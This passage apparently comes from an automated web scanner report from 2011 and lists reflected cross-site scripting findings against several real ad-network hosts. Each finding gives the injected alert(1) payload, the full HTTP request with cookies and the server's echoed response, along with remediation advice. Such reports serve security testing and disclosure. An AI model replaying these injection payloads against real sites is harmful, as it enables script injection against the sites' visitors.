c/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP15EOheQIMp6aIYFMFwqgWKICRGi4LkSGHuoVo77dVqa7OUgcXqUqruxUK6pw26DoqAlJFLZfT4Ux5SbqTCquHuUc/XRFeRyFWPT6EN6ib9rOgornIgakmFz75BmUiSaHo+JZst/oPR9Zq4Tt2uVGJOix55hSkJ3LJKPQI1gnqJcPO+B0wk0qpMSQXyFuCqQpK8r5tYBj/bmtqBKECRDiwMULcazzRzzBdevJ3YZlw1fzc91DujPMvIrU3lBGHD+Oj3GY34vTCgAsALTSPABX9K+qdf26V67jxb2rFhuao8e8wHgc9RUGL1UarXrcKQoVg0O/dT54uSAyDaigAqzmSFzhzgmZT9BJMxPzc4NCP+DgolO7MVTtmzKnuBLvpPBvKHLv25Ok9kGqHBB+5DATvbNCMmEyH/IFwSZOzLes1MyDqRGKgNkRhQbjaoTJLPdtrCZICmiIGgDOjcsfvI7HUAbHc5uDjeMNE0BTWYE73Cg/viOkfNPjdw0BwOKK7W5JcIsu2UEjjN2Zn/OkFtTDweZtF; rtc_dGQ8=MLvntzE1JhpnJ5HLrv64joSEnGpKJDT5hxKcHQSZ6JT8viKgWFC/KkqPtZ8Ankr/EnNoaE3mdCHtdlcixiAHZGc5ezrv5YBAdX/ffqRorXEpNdm/rNPw0/Ru+FNWlqRUvIr8NZmaxT1XfsCBFwC57YYoJ8dUD0ufXIbI1AwqHU25HskJyoFKznw/sQhMPIHBJ73VP+WsQCcosoyebxnNQyk5bw9Bsr4Ajd4MGQyGjCMZs9RGNNK3gZkDTzt4/z2P/Ssv9/K+M83DKiwjAWi8utGtTdqyGb4IzhNu3lsN08QDZagfgB4l585OsT74yWCR/KejYXQTd4DW18xFu0u1sQaoaWTBOY/Jxq6p5u3FJalMuYrYBWmo4ctB0D/HgTzFFyfS+BUCo8wmacnHn4O/MsiR2LqU0m03bN27yxGajd0JW3dCdPkdZinY1oMQBDI5k5dohjorfehJRmVPiseZIe1egdAPJ2sDRkJZHabCSecm5jjK+CYjNinTqMghBbn4sodp/UCGYsEy7xf7J4OYFvLqndKiTaZQoJcUKc5oyzoKOM7++hWWLcTkob9bgmW9ufD3VkBebI8gJJxHhcKHrWm/eJZhnAjZdYP8LmVqJGER/ulNivQAr1Z9gh1pS4MHtL1CBSQLuxshNTfgm9Qnh83PhCXe6Yvk2VmX7Au4CemkqCTRRfHacCGSXK27rvSN58qKJgVMxMrJq29BzeVX0qGqvzZWmcCYGuyXUAPPKpj0eqmYV3+M63GrKuWMAA8+PbgoD5b7UZmM09hAnd1w2MxukZA3cMw0224znNvYvw3C0g+hDTgcn2mNvmM3NKx69VBxkjkOZxx6XZSBxHuDhwFRo0mFMBl0fKMGrF9xGVp42oFAH1EEod/28MSymYNvCbsfK4npaI+P8SK2x4V96vPHuTLDy/Cx6vHAh+vGlGwUBCANBff9nrluERrS+3Fyfx+Ui+p8hfo8cX2P+ETONPEfu+uP1+RCcG/400DyLJkt2SPTwT9pApTDqP6SZyya0LZzhosQBzN0pTIbzDXEeGOqYZP9VfGtLlYN69+lf/n0KwunQtrPfAR1dQ8puRIko3TButILht14pfWmofo5W0T3geacseWomgQLjLT3uFWX/HXp+K3yYMD+s1qh/O5fZ21itvVvyjurOJNHwPCBFNddUGGdHNUGO1T1Kyo42ZT/kMjgqiVSPrh+V27aJE522u9E5Uuvj48++J9zk0HAF4MP8pbMoeaq1U3zJHDdejn5X/BXm+thzK+Rj0hfGndyks5pZb2IvqvIrRO+Jh9lMW0WRh3MqKF/QUxLA0DV9lTInWhVKKDHCLf9B+Vr8d64IvjJ1SaxZM731RZxyn8HrvU6mZZo5hMLOYr95YzEFr9ZgdqU00kw90WgDPabslCoBnR8vLiP2BaVC7rX6eFBOv1ASiKQM9hdr0/ut12g3n8MYbIDtI7ghXyI31mAtBtWKqCrPU/eor48rAdH+FDHc8bvtoW73rj1Tpdq4/+oeY7fdYQjg3DsXB1bJFC2aHnkmzrR3l28WWFHb9D/32f+BBQA; rsiPus_wuF1="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt97xKhGoM8aleSaGIyXRDs4FkB8sFCZuw+T+165hyVBVJdSmUgvaZFUEgQ++TCUEHmPCzXDcHU3/q71ALbK2PSrJN+jB0Gcwa4UhPEVrUN6TcHwqPWgepSOQrGAM308YkJ9Kue16ot0nIp6qAd3oiL1vu8ImerbnCX9fr9JwgYkrBhGapemCFDjspZk1rtEaWVVb/SLwdVTkAbzsNzSnzwc5wGCa8jVcpLL1HEVmqAjL5TwOMK3qCqjZRxHhcVoCO32Vm2a4+oGoVsu6f5cdmr702F+fO8bJ0zUZTlrWdNQF76rVKVigm4I2aRP1upzq3Xa844B3rJfxR7kbIeqiNcOFqKbSbO0FyTBJmabs/5OGsVm8MzaWv8XDRsNoP6aqXleVpyBBYMCmndtzdvmN0PX2PGTSEgHhHEOXIef+hyFlWIYJXhKyB1GZ1nN2HxLnlweSc/bw47BG+TDLVioZi40WnLGVk5Z4CwWDF0HwdzaazFGEJnNpjYIdAXTH/lTD8va6y4gx9mPASTJgNc22xlesGWI7OxZl1lqQ7HaLFB1HNYBtc5bP7IeCvhsYBGZg7cviKgAqSA9rxV77UbSt7TCcEyrrWjO+3NEalTV9bExjEijsonVl1qiCkFcvi4aTfn0Xp29/bqHk9TGMy+VTExoryi89XrlvZChiv8aCqD5nn1swwyeI8WXt6PokJinNDm627rLE7xLD9GZAmT4EC6DnSNF66FJKT8gRriX0keP+ld6zjtUeyx5jDTsazJK/T22dm7i42KiJZZ+f3mfdl1R07uyRQ6zBPxN70+SfMEN0VDs+0K+P2dhEnHBFEMNjU7Q45KqoSl8BK7apDExjVxjQh+dsxHVzgaFZsZaqXyOVXEIOp8oSNlzyOlBEIL/wfuQMfqNOFtMORF41x2ag+MOqOOgTOdugSJ08l6FYGH5XPnZQcM6Qwefavxgc9IzEXOoF0bdiHi8Phz+D5O/sUnh+KES8fiVsIqDkgN/d4VXR+Bqtve+rF1K2Zq3A=="; rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 09 May 2011 13:59:33 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 10 May 2011 13:59:33 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:32 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "B087254FEC0<SCRIPT>ALERT(1)</SCRIPT>53371E24C20" was not recognized.
*/
3.61. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.tribune/uscell_ldev_300x600_05311

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cb81'-alert(1)-'b8e98f3c48c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.tribune6cb81'-alert(1)-'b8e98f3c48c/uscell_ldev_300x600_05311;tgt=brand;sz=300x600;net=cm;ord=5044004;ord1=680525;cmpgurl=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:40 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:40 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 13:59:40 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Mon, 16-May-2011 13:59:40 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Mon, 09-May-2011 21:59:40 GMT
Content-Length: 8511

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-31746490_1304949580","http://ib.adnxs.com/ptj?member=311&inv_code=cm.tribune6cb81'-alert(1)-'b8e98f3c48c&size=300x600&imp_id=cm-31746490_1304949580,11f8f328940989e&referrer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&redir=http%3A%2F%2Fad.doublecli
...[SNIP]...
3.62. http://mf.sitescout.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a78a8'%3balert(1)//00e601315 was submitted in the h parameter. This input was echoed as a78a8';alert(1)//00e601315 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0C66F16&w=728&h=90a78a8'%3balert(1)//00e601315&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc= HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 825
Date: Mon, 09 May 2011 14:05:20 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0C66F16&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728" HEIGHT="90a78a8';alert(1)//00e601315" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...
3.63. http://mf.sitescout.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e518d"%3balert(1)//a5aa06a04d8 was submitted in the pid parameter. This input was echoed as e518d";alert(1)//a5aa06a04d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0C66F16e518d"%3balert(1)//a5aa06a04d8&w=728&h=90&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc= HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 827
Date: Mon, 09 May 2011 14:04:58 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0C66F16e518d";alert(1)//a5aa06a04d8&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAc
...[SNIP]...
3.64. http://mf.sitescout.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mf.sitescout.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef2c1'%3balert(1)//7221dd363f9 was submitted in the w parameter. This input was echoed as ef2c1';alert(1)//7221dd363f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=0C66F16&w=728ef2c1'%3balert(1)//7221dd363f9&h=90&rnd=1304949670&cm=http://ib.adnxs.com/click/6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA./cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC/referrer=http%3A%2F%2Fwww.thevine.com.au/clickenc= HTTP/1.1
Host: mf.sitescout.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAgMCAAUAAAAAcSfwIAAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949710%29%3Buf%28%27r%27%2C+184995%2C+1304949710%29%3B&cnd=!oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 827
Date: Mon, 09 May 2011 14:05:08 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://mf.sitescout.com/disp?pid=0C66F16&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4
...[SNIP]...
<IFRAME SRC="'
+ pUrl
+ '" WIDTH="728ef2c1';alert(1)//7221dd363f9" HEIGHT="90" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...
3.65. http://odb.outbrain.com/utils/odb [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/odb

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b69c3<script>alert(1)</script>e2bfb5961ba was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /utils/odb?method=get_score_rec&key=GANHREW345&url=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&idx=0&num=5&srv_pc=true&max_num_ads=1&nostar=true&format=json&callback=GEL.thepage.pageinfo.outbrain.initb69c3<script>alert(1)</script>e2bfb5961ba&blog_posts=true HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2=uaMqgoSgWEsyZpjyGwNcoBSjR24A8Yxx; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 14:00:58 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDlkJWlQEP7SN0="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:59 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzcjif+xs0aSMA=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 16-May-2011 02:48:59 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:59 GMT; Path=/
Set-Cookie: recs="FV47GVeXRORHPpgXLLfd98jd++c7SuJ1jsmR0F2fogHZ8/NhA+/K2Td+Ksz08zkobEEsJhOBOBs="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 14:05:59 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:58 GMT
Content-Length: 4052

GEL.thepage.pageinfo.outbrain.initb69c3<script>alert(1)</script>e2bfb5961ba({'response':{'exec_time':18,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204042585','req_id':'1c635d46d8c496585f548332cbeac0c0'},'score':{'preferred':'average','personal':{'score'
...[SNIP]...
3.66. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81 [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /124044/2cda0cc53888bd4bde08b06faa4b2d81

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 957ed<script>alert(1)</script>ba18c99c1cd was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /124044/2cda0cc53888bd4bde08b06faa4b2d81?callback=BF_PARTNER.gate_response957ed<script>alert(1)</script>ba18c99c1cd&cb=3766 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 70
Cache-Control: max-age=3582
Expires: Mon, 09 May 2011 15:06:42 GMT
Date: Mon, 09 May 2011 14:07:00 GMT
Connection: close

BF_PARTNER.gate_response957ed<script>alert(1)</script>ba18c99c1cd(0);
3.67. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fab5a"><script>alert(1)</script>ac6ea673d6b was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=fab5a"><script>alert(1)</script>ac6ea673d6b&sp=y&admeld_call_type=iframe&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
